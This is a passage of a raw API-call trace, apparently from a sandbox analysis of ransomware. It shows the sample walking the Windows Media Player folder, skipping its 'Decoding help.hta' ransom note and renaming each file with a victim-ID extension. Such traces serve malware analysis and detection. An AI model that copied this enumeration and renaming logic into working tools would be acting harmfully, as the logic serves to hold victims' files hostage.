returned="\\\\?\\C:\\Program Files\\Windows Media Player\\Decoding help.hta" [0039.805] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Media Player\\Decoding help.hta" (normalized: "c:\\program files\\windows media player\\decoding help.hta")) returned 0x1 [0039.805] lstrcmpiW (lpString1="Decoding help.hta", lpString2="WMPDMCCore.dll") returned -1 [0039.805] lstrlenW (lpString="WMPDMCCore.dll") returned 14 [0039.805] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Media Player\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\*.*" [0039.805] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Media Player\\*.*") returned 45 [0039.805] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\", lpString2="WMPDMCCore.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\WMPDMCCore.dll") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\WMPDMCCore.dll" [0039.805] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Media Player\\WMPDMCCore.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\WMPDMCCore.dll") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\WMPDMCCore.dll" [0039.805] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\WMPDMCCore.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\WMPDMCCore.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\WMPDMCCore.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0039.806] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Windows Media Player\\WMPDMCCore.dll" (normalized: "c:\\program files\\windows media player\\wmpdmccore.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Windows Media Player\\WMPDMCCore.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\windows media player\\wmpdmccore.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0039.806] FindNextFileW (in: hFindFile=0x5a52f0, lpFindFileData=0x91cfd30 | out: lpFindFileData=0x91cfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5b1930c1, ftCreationTime.dwHighDateTime=0x1ca0419, ftLastAccessTime.dwLowDateTime=0x5b1930c1, ftLastAccessTime.dwHighDateTime=0x1ca0419, ftLastWriteTime.dwLowDateTime=0xfdb75f20, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x6c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="wmpenc.exe", cAlternateFileName="")) returned 1 [0039.806] lstrcpyW (in: lpString1=0x595038, lpString2="\\\\?\\C:\\Program Files\\Windows Media Player\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\*.*" [0039.806] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Media Player\\*.*") returned 45 [0039.806] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\Decoding help.hta" [0039.806] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Media Player\\Decoding help.hta" (normalized: "c:\\program files\\windows media player\\decoding help.hta")) returned 0x1 [0039.806] lstrcmpiW (lpString1="Decoding help.hta", lpString2="wmpenc.exe") returned -1 [0039.806] lstrlenW (lpString="wmpenc.exe") returned 10 [0039.806] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Media Player\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\*.*" [0039.806] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Media Player\\*.*") returned 45 [0039.806] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\", lpString2="wmpenc.exe" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\wmpenc.exe") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\wmpenc.exe" [0039.806] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Media Player\\wmpenc.exe" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\wmpenc.exe") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\wmpenc.exe" [0039.806] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\wmpenc.exe", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\wmpenc.exe.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\wmpenc.exe.[ID]g9uZrLhJaygpwRm1[ID]" [0039.806] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Windows Media Player\\wmpenc.exe" (normalized: "c:\\program files\\windows media player\\wmpenc.exe"), lpNewFileName="\\\\?\\C:\\Program Files\\Windows Media Player\\wmpenc.exe.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\windows media player\\wmpenc.exe.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0039.806] FindNextFileW (in: hFindFile=0x5a52f0, lpFindFileData=0x91cfd30 | out: lpFindFileData=0x91cfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8f318ba, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa8f318ba, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa8f318ba, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x28e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="wmplayer.exe", cAlternateFileName="")) returned 1 [0039.806] lstrcpyW (in: lpString1=0x595038, lpString2="\\\\?\\C:\\Program Files\\Windows Media Player\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\*.*" [0039.806] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Media Player\\*.*") returned 45 [0039.806] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\Decoding help.hta" [0039.806] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Media Player\\Decoding help.hta" (normalized: "c:\\program files\\windows media player\\decoding help.hta")) returned 0x1 [0039.806] lstrcmpiW (lpString1="Decoding help.hta", lpString2="wmplayer.exe") returned -1 [0039.806] lstrlenW (lpString="wmplayer.exe") returned 12 [0039.807] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Media Player\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\*.*" [0039.807] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Media Player\\*.*") returned 45 [0039.807] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\", lpString2="wmplayer.exe" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\wmplayer.exe") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\wmplayer.exe" [0039.807] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Media Player\\wmplayer.exe" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\wmplayer.exe") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\wmplayer.exe" [0039.807] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\wmplayer.exe", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\wmplayer.exe.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\wmplayer.exe.[ID]g9uZrLhJaygpwRm1[ID]" [0039.807] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Windows Media Player\\wmplayer.exe" (normalized: "c:\\program files\\windows media player\\wmplayer.exe"), lpNewFileName="\\\\?\\C:\\Program Files\\Windows Media Player\\wmplayer.exe.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\windows media player\\wmplayer.exe.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0039.807] FindNextFileW (in: hFindFile=0x5a52f0, lpFindFileData=0x91cfd30 | out: lpFindFileData=0x91cfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6431260b, ftCreationTime.dwHighDateTime=0x1ca0419, ftLastAccessTime.dwLowDateTime=0x6431260b, ftLastAccessTime.dwHighDateTime=0x1ca0419, ftLastWriteTime.dwLowDateTime=0x462abc20, ftLastWriteTime.dwHighDateTime=0x1ca0424, nFileSizeHigh=0x0, nFileSizeLow=0x28000, dwReserved0=0x0, dwReserved1=0x0, cFileName="WMPMediaSharing.dll", cAlternateFileName="")) returned 1 [0039.807] lstrcpyW (in: lpString1=0x595038, lpString2="\\\\?\\C:\\Program Files\\Windows Media Player\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\*.*" [0039.807] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Media Player\\*.*") returned 45 [0039.807] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\Decoding help.hta" [0039.807] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Media Player\\Decoding help.hta" (normalized: "c:\\program files\\windows media player\\decoding help.hta")) returned 0x1 [0039.807] lstrcmpiW (lpString1="Decoding help.hta", lpString2="WMPMediaSharing.dll") returned -1 [0039.807] lstrlenW (lpString="WMPMediaSharing.dll") returned 19 [0039.807] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Media Player\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\*.*" [0039.807] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Media Player\\*.*") returned 45 [0039.807] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\", lpString2="WMPMediaSharing.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\WMPMediaSharing.dll") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\WMPMediaSharing.dll" [0039.807] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Media Player\\WMPMediaSharing.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\WMPMediaSharing.dll") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\WMPMediaSharing.dll" [0039.807] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\WMPMediaSharing.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\WMPMediaSharing.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\WMPMediaSharing.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0039.807] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Windows Media Player\\WMPMediaSharing.dll" (normalized: "c:\\program files\\windows media player\\wmpmediasharing.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Windows Media Player\\WMPMediaSharing.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\windows media player\\wmpmediasharing.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0039.807] FindNextFileW (in: hFindFile=0x5a52f0, lpFindFileData=0x91cfd30 | out: lpFindFileData=0x91cfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb0b4545e, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb0b4545e, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb0b6b5be, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x174600, dwReserved0=0x0, dwReserved1=0x0, cFileName="wmpnetwk.exe", cAlternateFileName="")) returned 1 [0039.807] lstrcpyW (in: lpString1=0x595038, lpString2="\\\\?\\C:\\Program Files\\Windows Media Player\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\*.*" [0039.807] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Media Player\\*.*") returned 45 [0039.808] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\Decoding help.hta" [0039.808] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Media Player\\Decoding help.hta" (normalized: "c:\\program files\\windows media player\\decoding help.hta")) returned 0x1 [0039.808] lstrcmpiW (lpString1="Decoding help.hta", lpString2="wmpnetwk.exe") returned -1 [0039.808] lstrlenW (lpString="wmpnetwk.exe") returned 12 [0039.808] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Media Player\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\*.*" [0039.808] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Media Player\\*.*") returned 45 [0039.808] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\", lpString2="wmpnetwk.exe" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\wmpnetwk.exe") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\wmpnetwk.exe" [0039.808] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Media Player\\wmpnetwk.exe" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\wmpnetwk.exe") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\wmpnetwk.exe" [0039.808] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\wmpnetwk.exe", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\wmpnetwk.exe.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\wmpnetwk.exe.[ID]g9uZrLhJaygpwRm1[ID]" [0039.808] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Windows Media Player\\wmpnetwk.exe" (normalized: "c:\\program files\\windows media player\\wmpnetwk.exe"), lpNewFileName="\\\\?\\C:\\Program Files\\Windows Media Player\\wmpnetwk.exe.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\windows media player\\wmpnetwk.exe.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0039.808] FindNextFileW (in: hFindFile=0x5a52f0, lpFindFileData=0x91cfd30 | out: lpFindFileData=0x91cfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x66334c83, ftCreationTime.dwHighDateTime=0x1ca0419, ftLastAccessTime.dwLowDateTime=0x66334c83, ftLastAccessTime.dwHighDateTime=0x1ca0419, ftLastWriteTime.dwLowDateTime=0xfe0cf930, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x11400, dwReserved0=0x0, dwReserved1=0x0, cFileName="wmpnscfg.exe", cAlternateFileName="")) returned 1 [0039.808] lstrcpyW (in: lpString1=0x595038, lpString2="\\\\?\\C:\\Program Files\\Windows Media Player\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\*.*" [0039.808] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Media Player\\*.*") returned 45 [0039.808] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\Decoding help.hta" [0039.808] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Media Player\\Decoding help.hta" (normalized: "c:\\program files\\windows media player\\decoding help.hta")) returned 0x1 [0039.808] lstrcmpiW (lpString1="Decoding help.hta", lpString2="wmpnscfg.exe") returned -1 [0039.808] lstrlenW (lpString="wmpnscfg.exe") returned 12 [0039.808] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Media Player\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\*.*" [0039.808] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Media Player\\*.*") returned 45 [0039.808] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\", lpString2="wmpnscfg.exe" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\wmpnscfg.exe") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\wmpnscfg.exe" [0039.808] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Media Player\\wmpnscfg.exe" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\wmpnscfg.exe") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\wmpnscfg.exe" [0039.808] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\wmpnscfg.exe", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\wmpnscfg.exe.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\wmpnscfg.exe.[ID]g9uZrLhJaygpwRm1[ID]" [0039.808] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Windows Media Player\\wmpnscfg.exe" (normalized: "c:\\program files\\windows media player\\wmpnscfg.exe"), lpNewFileName="\\\\?\\C:\\Program Files\\Windows Media Player\\wmpnscfg.exe.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\windows media player\\wmpnscfg.exe.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0039.809] FindNextFileW (in: hFindFile=0x5a52f0, lpFindFileData=0x91cfd30 | out: lpFindFileData=0x91cfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x66e8341f, ftCreationTime.dwHighDateTime=0x1ca0419, ftLastAccessTime.dwLowDateTime=0x66e8341f, ftLastAccessTime.dwHighDateTime=0x1ca0419, ftLastWriteTime.dwLowDateTime=0x462d2d20, ftLastWriteTime.dwHighDateTime=0x1ca0424, nFileSizeHigh=0x0, nFileSizeLow=0x87200, dwReserved0=0x0, dwReserved1=0x0, cFileName="wmpnssci.dll", cAlternateFileName="")) returned 1 [0039.809] lstrcpyW (in: lpString1=0x595038, lpString2="\\\\?\\C:\\Program Files\\Windows Media Player\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\*.*" [0039.809] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Media Player\\*.*") returned 45 [0039.809] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\Decoding help.hta" [0039.809] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Media Player\\Decoding help.hta" (normalized: "c:\\program files\\windows media player\\decoding help.hta")) returned 0x1 [0039.809] lstrcmpiW (lpString1="Decoding help.hta", lpString2="wmpnssci.dll") returned -1 [0039.809] lstrlenW (lpString="wmpnssci.dll") returned 12 [0039.809] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Media Player\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\*.*" [0039.809] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Media Player\\*.*") returned 45 [0039.809] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\", lpString2="wmpnssci.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\wmpnssci.dll") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\wmpnssci.dll" [0039.809] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Media Player\\wmpnssci.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\wmpnssci.dll") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\wmpnssci.dll" [0039.809] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\wmpnssci.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\wmpnssci.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\wmpnssci.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0039.809] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Windows Media Player\\wmpnssci.dll" (normalized: "c:\\program files\\windows media player\\wmpnssci.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Windows Media Player\\wmpnssci.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\windows media player\\wmpnssci.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0039.809] FindNextFileW (in: hFindFile=0x5a52f0, lpFindFileData=0x91cfd30 | out: lpFindFileData=0x91cfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4ff32e2e, ftCreationTime.dwHighDateTime=0x1ca0419, ftLastAccessTime.dwLowDateTime=0x4ff32e2e, ftLastAccessTime.dwHighDateTime=0x1ca0419, ftLastWriteTime.dwLowDateTime=0x462d2d20, ftLastWriteTime.dwHighDateTime=0x1ca0424, nFileSizeHigh=0x0, nFileSizeLow=0x8800, dwReserved0=0x0, dwReserved1=0x0, cFileName="WMPNSSUI.dll", cAlternateFileName="")) returned 1 [0039.809] lstrcpyW (in: lpString1=0x595038, lpString2="\\\\?\\C:\\Program Files\\Windows Media Player\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\*.*" [0039.809] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Media Player\\*.*") returned 45 [0039.809] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\Decoding help.hta" [0039.809] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Media Player\\Decoding help.hta" (normalized: "c:\\program files\\windows media player\\decoding help.hta")) returned 0x1 [0039.809] lstrcmpiW (lpString1="Decoding help.hta", lpString2="WMPNSSUI.dll") returned -1 [0039.809] lstrlenW (lpString="WMPNSSUI.dll") returned 12 [0039.809] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Media Player\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\*.*" [0039.809] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Media Player\\*.*") returned 45 [0039.810] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\", lpString2="WMPNSSUI.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\WMPNSSUI.dll") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\WMPNSSUI.dll" [0039.810] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Media Player\\WMPNSSUI.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\WMPNSSUI.dll") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\WMPNSSUI.dll" [0039.810] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\WMPNSSUI.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\WMPNSSUI.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\WMPNSSUI.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0039.810] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Windows Media Player\\WMPNSSUI.dll" (normalized: "c:\\program files\\windows media player\\wmpnssui.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Windows Media Player\\WMPNSSUI.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\windows media player\\wmpnssui.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0039.810] FindNextFileW (in: hFindFile=0x5a52f0, lpFindFileData=0x91cfd30 | out: lpFindFileData=0x91cfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5dde8703, ftCreationTime.dwHighDateTime=0x1ca0419, ftLastAccessTime.dwLowDateTime=0x5dde8703, ftLastAccessTime.dwHighDateTime=0x1ca0419, ftLastWriteTime.dwLowDateTime=0xfe11b420, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x12800, dwReserved0=0x0, dwReserved1=0x0, cFileName="wmprph.exe", cAlternateFileName="")) returned 1 [0039.810] lstrcpyW (in: lpString1=0x595038, lpString2="\\\\?\\C:\\Program Files\\Windows Media Player\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\*.*" [0039.810] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Media Player\\*.*") returned 45 [0039.810] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\Decoding help.hta" [0039.810] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Media Player\\Decoding help.hta" (normalized: "c:\\program files\\windows media player\\decoding help.hta")) returned 0x1 [0039.810] lstrcmpiW (lpString1="Decoding help.hta", lpString2="wmprph.exe") returned -1 [0039.810] lstrlenW (lpString="wmprph.exe") returned 10 [0039.810] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Media Player\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\*.*" [0039.810] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Media Player\\*.*") returned 45 [0039.810] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\", lpString2="wmprph.exe" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\wmprph.exe") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\wmprph.exe" [0039.810] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Media Player\\wmprph.exe" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\wmprph.exe") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\wmprph.exe" [0039.810] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\wmprph.exe", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\wmprph.exe.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\wmprph.exe.[ID]g9uZrLhJaygpwRm1[ID]" [0039.810] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Windows Media Player\\wmprph.exe" (normalized: "c:\\program files\\windows media player\\wmprph.exe"), lpNewFileName="\\\\?\\C:\\Program Files\\Windows Media Player\\wmprph.exe.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\windows media player\\wmprph.exe.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0039.810] FindNextFileW (in: hFindFile=0x5a52f0, lpFindFileData=0x91cfd30 | out: 